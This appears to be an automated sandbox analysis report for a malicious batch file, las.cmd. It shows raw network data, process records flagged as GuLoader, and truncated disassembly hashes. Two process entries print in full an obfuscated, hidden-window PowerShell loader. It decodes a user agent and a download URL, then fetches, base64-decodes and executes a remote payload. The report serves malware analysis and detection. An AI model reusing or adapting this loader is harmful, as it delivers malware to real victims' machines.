                                                                                                  2024-05-23 19:09:15 UTC16384INData Raw: 39 27 8c 53 4c 75 df d8 f8 7a 44 4f 35 32 bd 20 5a 24 c5 bf 6f 8c 28 7b 52 d8 66 da 8a 7c fd 37 49 97 8c 45 cc f3 3c 37 97 15 23 37 3c 7b 15 2a ae f0 2e dc c2 69 55 6b 28 58 8f 2d 23 e2 5f 47 95 1c 00 95 69 b5 5f 34 39 1d 2e 56 bb 07 6e 5a 61 35 72 91 b9 08 8a f2 81 93 14 19 97 63 39 53 b6 bf 8b 80 24 f7 0b 2c d7 b5 7c 27 a7 f6 65 5f e0 fa a5 14 73 fe 48 bd e9 bd d9 07 97 2a 72 35 2c 29 e4 a6 3e 49 71 ce f2 f9 fa 08 44 e4 3c 85 65 ba a2 fe 3c 7a e4 99 b6 1b 38 34 5c c8 56 b7 ad 66 82 bc 59 ba 9d 20 09 cc a9 d9 75 57 67 90 2a 46 e9 cf 0b 79 0b 05 41 65 7f 44 e5 36 ab 32 4a 10 1b 7a b8 0e 5a 15 21 4f 4a bd 5e d8 3f 0a ee ec c0 4c 00 f4 5f 23 1e 2c 16 da c4 2e 77 0b 4f ed b9 d8 79 04 84 46 48 bf 4c 22 a4 45 84 0a 7f ef a6 92 0b 54 90 4f ef 46 68 97 7b d9 f8
                                                                                                  Data Ascii: 9'SLuzDO52 Z$o({Rf|7IE<7#7<{*.iUk(X-#_Gi_49.VnZa5rc9S$,|'e_sH*r5,)>IqD<e<z84\VfY uWg*FyAeD62JzZ!OJ^?L_#,.wOyFHL"ETOFh{
                                                                                                  2024-05-23 19:09:15 UTC16384INData Raw: 30 a8 4e 38 de 0b ed fb 14 b0 c6 b7 d5 43 20 a2 3f 22 b4 0a 2e 35 4a 4c a3 96 60 d4 b0 94 90 76 53 70 39 e6 62 e6 25 02 46 79 00 d8 e7 ed ce 79 22 83 2a ec 88 88 11 2b 6f 37 fe de 3f 63 b6 71 8d 4f 1a 04 89 96 94 2e 43 ab f6 77 c6 44 05 3e 3b 40 e0 64 f2 fc 42 8e d5 f0 9b 70 95 c7 ac c4 e9 f2 8b e8 99 6a 47 e7 c3 88 7a c3 ad 37 d2 6f 5f ba 7f de 7a 2f ae a5 42 61 30 b1 58 8e 73 39 ea 08 2d 4d 55 21 6a 23 80 d7 ba 17 ff 06 46 21 21 b6 b1 74 0a 84 b7 3c df ec 94 b6 25 e3 fa bd a6 77 63 91 9a 78 a1 4c ec 24 bb 87 58 e3 a0 fa 4a 50 2e bb 67 b8 27 cc 03 69 67 05 91 25 76 a4 22 d3 44 e7 bc 02 56 e0 95 7f bc 96 38 67 f5 49 74 dd 01 47 9c d2 e9 4a 26 42 c8 89 8b a3 d8 77 76 09 9f f5 95 e6 13 31 ba 66 03 45 91 6a 68 05 27 be 06 4f ea 78 af 85 e0 73 9d 84 f7 ce 71
                                                                                                  Data Ascii: 0N8C ?".5JL`vSp9b%Fyy"*+o7?cqO.CwD>;@dBpjGz7o_z/Ba0Xs9-MU!j#F!!t<%wcxL$XJP.g'ig%v"DV8gItGJ&Bwv1fEjh'Oxsq
                                                                                                  2024-05-23 19:09:15 UTC8183INData Raw: 8c 81 ab e5 69 2c e2 72 f4 7d f3 35 37 f5 4b 7b 85 36 4b 83 26 4d 07 6e 77 dd 51 38 4b b1 de fa 12 21 67 3f 16 fd 98 75 2b a1 d9 8c 32 6f 91 53 59 af a4 74 54 35 c6 58 4f 3e 68 ce a3 b4 82 9a d2 6f 7f 4b 61 57 50 13 1f 32 9e 47 5b 8c f1 c4 61 72 68 ee d0 4a 3c bd b8 b9 45 93 56 26 0f 81 c2 69 92 10 1f ee ff 73 ac ab c2 49 71 7c 0a a4 94 d4 ad 4b 50 1c a0 1d ec 23 f2 8c 5f 5d db c2 77 3e 19 bb 25 7f e7 13 db 37 0a 7d 81 37 0f 15 b5 dd aa 5e fa 80 f6 3c 38 48 1f b6 3a b1 46 70 fb d6 73 48 51 19 20 71 7a 48 84 74 ad 58 fc 3a ac 22 d1 95 36 a6 cd e8 fb e7 b5 d9 32 c8 1f 4c 6d 6f 4c 32 75 4e 94 df 05 65 01 37 04 6d 22 70 d8 8b f7 fb 0e 06 8e 22 d5 82 5e 3b de 81 ce 7b 13 41 6f 28 48 ed 35 ff 5a 88 0b db c1 b0 70 54 fd 8b 12 07 41 43 40 5c 98 e2 ea b7 4a d7 64
                                                                                                  Data Ascii: i,r}57K{6K&MnwQ8K!g?u+2oSYtT5XO>hoKaWP2G[arhJ<EV&isIq|KP#_]w>%7}7^<8H:FpsHQ qzHtX:"62LmoL2uNe7m"p"^;{Ao(H5ZpTAC@\Jd


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:15:08:43
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
                                                                                                  Imagebase:0x7ff68faa0000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:15:08:43
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:2
                                                                                                  Start time:15:08:44
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHydro ');$Fuglevildts=Udvindende 'smert$RgrelBStou,aCountsMylari,rasic.illehSi narMortmoHo.opm mateil brroConchlHus.oe lash.A.ophD SammoSti nw Analn RetilDag,ro TheraSuba.d Re.oFZittaiPae,nlUdrejeEr at(Garli$KorreSAkillpRedrer NetvnI,comgFormun PolyiPhenynBrutagJav neTapetr AlkasShera, Klip$MiljvR InsueUdtolgDeckhnForsks ,ampkRe.etaPoch.bEvi,asUlrdhlNow,noHaincvMangfe.egyns Slaa)Vikka ';$Regnskabsloves=$Saluterer[0];Unschool (Udvindende 'Frimu$KoncegBremslPolybolumbrbFru.ta UnfolFejlv:fore,MQ irky SvensVidertidle.iirefakGra,ieDenatrP osen Vesteopera=Smage(indsbT Shi eCh zds DaektDelet-SkattP S amaRestutProx.h P.ss Assib$S,rewREndage MayfgPresunBrodeshved.k .ricaKun,ebSolsysCap tlSnawooMurphvFloreeAnt.kstombs)schiz ');while (!$Mystikerne) {Unschool (Udvindende 'Unexp$Exi,sgLivstl Oc,ioTuarebada.taChapalKerne: UtaaU.ardcnInadepS,nica DrgrrMon,loMelanl Tumuenati dtwof,= Do.a$UferptSte,mr BanguD tabeTrafi ') ;Unschool $Fuglevildts;Unschool (Udvindende 'OrestSunwoutUnrumaDisg rErst tA.ter-OpvasSIndhulMadrieC.emeeFricapmu tr Produ4Snker ');Unschool (Udvindende ' Afkr$algaeg.ekstl Bl.koEtaerbSaigaaTermil ugge:.edebM otatyUdelis okl.tDepthiNdrinkV,reieAnantrCos,vnCap.we fst.= Nrin(CircuTentereUd elsAuspitDybva-ElocaP S,utaSolb,tTilsihSwash Orien$.mlgnR spaleFiskegDr.ftnMul ssUnslokPabula FaldbWro.hsNonrelo.avuoAvlshv uftweDyrtisVk.tr)Confi ') ;Unschool (Udvindende 'Timar$ UdefgMell lA ospoAb ombDepreaLunatlCro i:BrndeSDu.pieArmlem Uoplp FaciiBaglytAfmoneAsketrUne inGar laAlle l ryd=loopf$Mult gHejrelba sao nspebStrafaRhinol Tus,:Baja.F Basta PjatsProdutInterlJunkeaSnowde Bldgg xarcgToplae SurfsD tid+ okse+Monkl%Opr.l$TarifFTzitzlAsserdTu,nhnLussii Jammn FredgGravisPenget BankiIndbldLandfeWynefn ,ribsInkie. DvekcLedeloSpl.juStrean F,lttBrndv ') ;$Sprngningers=$Fldningstidens[$Sempiternal];}$Erstatningsfri=301739;$Capanne=29374;Unschool (Udvindende ',andr$Chrong isthlDipl oAmet.bPenneaAdaw.lRnner:KundeBDaikeikarollapprefVirker,orosaSuperg,nraatIdenteGriphrForsg Skjal=Misvi ChapeGGulddeMtg,otTr.wl-UdlaaC.arstoAll rnVandrtDialle m,ntnY gadtKedso Nonpl$SpndeRA,dreeFlighgReg.onRi dasMiniskMckniaVarmeb BrodsJernbl Nor,oAfsk vUnsadeAfdrysdrevb ');Unschool (Udvindende ' .ntt$RevolgBrusel ublaoEng obPyntsaSk delSprjt:LderiS udbyvBrddeeSv skd Aarse Nonmk.ryggu rsterleddeeUnikan Multe Skuf Over,= rist Steen[Kil eSMirexy.nforsRe.owtKi noe El.emfiefe.CorelCAfskroIndusnTrivivFo.edeSitu,rBurdstAlbes]Linie:Jumps:FaradFVealyrLommeoMythomR,forBStyreaEffuss Cagie Pr.g6Presc4 TymbS Ci,rtNontrrMetatiSpo,enPaadugTech (Tryka$CaracBHoeviiImporlSagfrf HentrKinseaGesitgShirrtLiotre U.varTempe)Seleu ');Unschool (Udvindende 'Autop$ZorrigHalvalUbeslo Py,sb.ruppaKon ol.nfor:ExtraT Un.ei Max lH.bbesOldweiDeunak D sprUdvidiUnfe,nBradegTalg. F,ers=Udsal Afre,[MarinShonilyUnfriscpositdissieWess mSag,b.DumpoT,ulleeEcto x LavrtCha h. Ud eEAnisonRebalcSterioBl erdHjem,iD.catnsu.figHa dl]Irrec:Viges:pantoAOvergSM rtiCUnfoiIA.tfuI,uthe.Bl baGkel eeRevertIdeasSTy.patTrafirPaph.iAzoxinOverbg Un o( Clem$ PipiSDebilvVokseeAnte.dElvereMi,roku deruPartir Mod.espirinBarbee Takk)Juckr ');Unschool (Udvindende 'Shurg$IntergAlarmlReorgoMongobC.oicaBoatal,elin:SourdOStrenwMaha.e,amelrVerdet,raada RolleS,pernCelle= Skru$Bro cTOve siProfilSubg.sSub eiCo,dekU yrlrEgetbi,ogienUnthegsinni.FjollsFortvuInar.bMaximsMos stF.rsgrAdvi i.tockn,ydisgTreef( Avia$IncorEKeelbr.enjis aksltIveliaKnlentRepolnSkrmbi DenonraptugpreexsDriftf .onkrSrgefiMat r,Afske$,hinnCHypnoaGrsgap,lumpaBlas.nLawnlnFisk e Ek p)Hy,ro ');Unschool $Owertaen;"
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:15:08:44
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:15:08:46
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
                                                                                                  Imagebase:0x7ff68faa0000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:15:08:53
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHydro ');$Fuglevildts=Udvindende 'smert$RgrelBStou,aCountsMylari,rasic.illehSi narMortmoHo.opm mateil brroConchlHus.oe lash.A.ophD SammoSti nw Analn RetilDag,ro TheraSuba.d Re.oFZittaiPae,nlUdrejeEr at(Garli$KorreSAkillpRedrer NetvnI,comgFormun PolyiPhenynBrutagJav neTapetr AlkasShera, Klip$MiljvR InsueUdtolgDeckhnForsks ,ampkRe.etaPoch.bEvi,asUlrdhlNow,noHaincvMangfe.egyns Slaa)Vikka ';$Regnskabsloves=$Saluterer[0];Unschool (Udvindende 'Frimu$KoncegBremslPolybolumbrbFru.ta UnfolFejlv:fore,MQ irky SvensVidertidle.iirefakGra,ieDenatrP osen Vesteopera=Smage(indsbT Shi eCh zds DaektDelet-SkattP S amaRestutProx.h P.ss Assib$S,rewREndage MayfgPresunBrodeshved.k .ricaKun,ebSolsysCap tlSnawooMurphvFloreeAnt.kstombs)schiz ');while (!$Mystikerne) {Unschool (Udvindende 'Unexp$Exi,sgLivstl Oc,ioTuarebada.taChapalKerne: UtaaU.ardcnInadepS,nica DrgrrMon,loMelanl Tumuenati dtwof,= Do.a$UferptSte,mr BanguD tabeTrafi ') ;Unschool $Fuglevildts;Unschool (Udvindende 'OrestSunwoutUnrumaDisg rErst tA.ter-OpvasSIndhulMadrieC.emeeFricapmu tr Produ4Snker ');Unschool (Udvindende ' Afkr$algaeg.ekstl Bl.koEtaerbSaigaaTermil ugge:.edebM otatyUdelis okl.tDepthiNdrinkV,reieAnantrCos,vnCap.we fst.= Nrin(CircuTentereUd elsAuspitDybva-ElocaP S,utaSolb,tTilsihSwash Orien$.mlgnR spaleFiskegDr.ftnMul ssUnslokPabula FaldbWro.hsNonrelo.avuoAvlshv uftweDyrtisVk.tr)Confi ') ;Unschool (Udvindende 'Timar$ UdefgMell lA ospoAb ombDepreaLunatlCro i:BrndeSDu.pieArmlem Uoplp FaciiBaglytAfmoneAsketrUne inGar laAlle l ryd=loopf$Mult gHejrelba sao nspebStrafaRhinol Tus,:Baja.F Basta PjatsProdutInterlJunkeaSnowde Bldgg xarcgToplae SurfsD tid+ okse+Monkl%Opr.l$TarifFTzitzlAsserdTu,nhnLussii Jammn FredgGravisPenget BankiIndbldLandfeWynefn ,ribsInkie. DvekcLedeloSpl.juStrean F,lttBrndv ') ;$Sprngningers=$Fldningstidens[$Sempiternal];}$Erstatningsfri=301739;$Capanne=29374;Unschool (Udvindende ',andr$Chrong isthlDipl oAmet.bPenneaAdaw.lRnner:KundeBDaikeikarollapprefVirker,orosaSuperg,nraatIdenteGriphrForsg Skjal=Misvi ChapeGGulddeMtg,otTr.wl-UdlaaC.arstoAll rnVandrtDialle m,ntnY gadtKedso Nonpl$SpndeRA,dreeFlighgReg.onRi dasMiniskMckniaVarmeb BrodsJernbl Nor,oAfsk vUnsadeAfdrysdrevb ');Unschool (Udvindende ' .ntt$RevolgBrusel ublaoEng obPyntsaSk delSprjt:LderiS udbyvBrddeeSv skd Aarse Nonmk.ryggu rsterleddeeUnikan Multe Skuf Over,= rist Steen[Kil eSMirexy.nforsRe.owtKi noe El.emfiefe.CorelCAfskroIndusnTrivivFo.edeSitu,rBurdstAlbes]Linie:Jumps:FaradFVealyrLommeoMythomR,forBStyreaEffuss Cagie Pr.g6Presc4 TymbS Ci,rtNontrrMetatiSpo,enPaadugTech (Tryka$CaracBHoeviiImporlSagfrf HentrKinseaGesitgShirrtLiotre U.varTempe)Seleu ');Unschool (Udvindende 'Autop$ZorrigHalvalUbeslo Py,sb.ruppaKon ol.nfor:ExtraT Un.ei Max lH.bbesOldweiDeunak D sprUdvidiUnfe,nBradegTalg. F,ers=Udsal Afre,[MarinShonilyUnfriscpositdissieWess mSag,b.DumpoT,ulleeEcto x LavrtCha h. Ud eEAnisonRebalcSterioBl erdHjem,iD.catnsu.figHa dl]Irrec:Viges:pantoAOvergSM rtiCUnfoiIA.tfuI,uthe.Bl baGkel eeRevertIdeasSTy.patTrafirPaph.iAzoxinOverbg Un o( Clem$ PipiSDebilvVokseeAnte.dElvereMi,roku deruPartir Mod.espirinBarbee Takk)Juckr ');Unschool (Udvindende 'Shurg$IntergAlarmlReorgoMongobC.oicaBoatal,elin:SourdOStrenwMaha.e,amelrVerdet,raada RolleS,pernCelle= Skru$Bro cTOve siProfilSubg.sSub eiCo,dekU yrlrEgetbi,ogienUnthegsinni.FjollsFortvuInar.bMaximsMos stF.rsgrAdvi i.tockn,ydisgTreef( Avia$IncorEKeelbr.enjis aksltIveliaKnlentRepolnSkrmbi DenonraptugpreexsDriftf .onkrSrgefiMat r,Afske$,hinnCHypnoaGrsgap,lumpaBlas.nLawnlnFisk e Ek p)Hy,ro ');Unschool $Owertaen;"
                                                                                                  Imagebase:0x520000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2001822967.0000000008D90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1989436125.000000000625A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2002398118.000000000ACBC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:15:08:54
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
                                                                                                  Imagebase:0x240000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:15:09:09
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                                  Imagebase:0x220000
                                                                                                  File size:516'608 bytes
                                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Executed Functions

                                                                                                    Function 00007FFD9B8AAB16 Relevance: .5, Instructions: 468COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2192769471.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e027d2fee868320f86a2a6b2ef64dd251bfb87a9a681c3abc88428c54b07258c
                                                                                                    • Instruction ID: a372160bec3eb2598ae3667196c38e76c24bf5bf3bacffaffcf03e129d10b2a1
                                                                                                    • Opcode Fuzzy Hash: e027d2fee868320f86a2a6b2ef64dd251bfb87a9a681c3abc88428c54b07258c
                                                                                                    • Instruction Fuzzy Hash: F5F1B730A09A8E8FEBA8DF68C8557F937D1FF58310F04426EE84DC76A5DB3499458B81
                                                                                                    Function 00007FFD9B8AB8C2 Relevance: .5, Instructions: 454COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2192769471.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 53e059868f0aec88c77a9c72aa2b05c97d429050475db6ecbc688cadd1a39eea
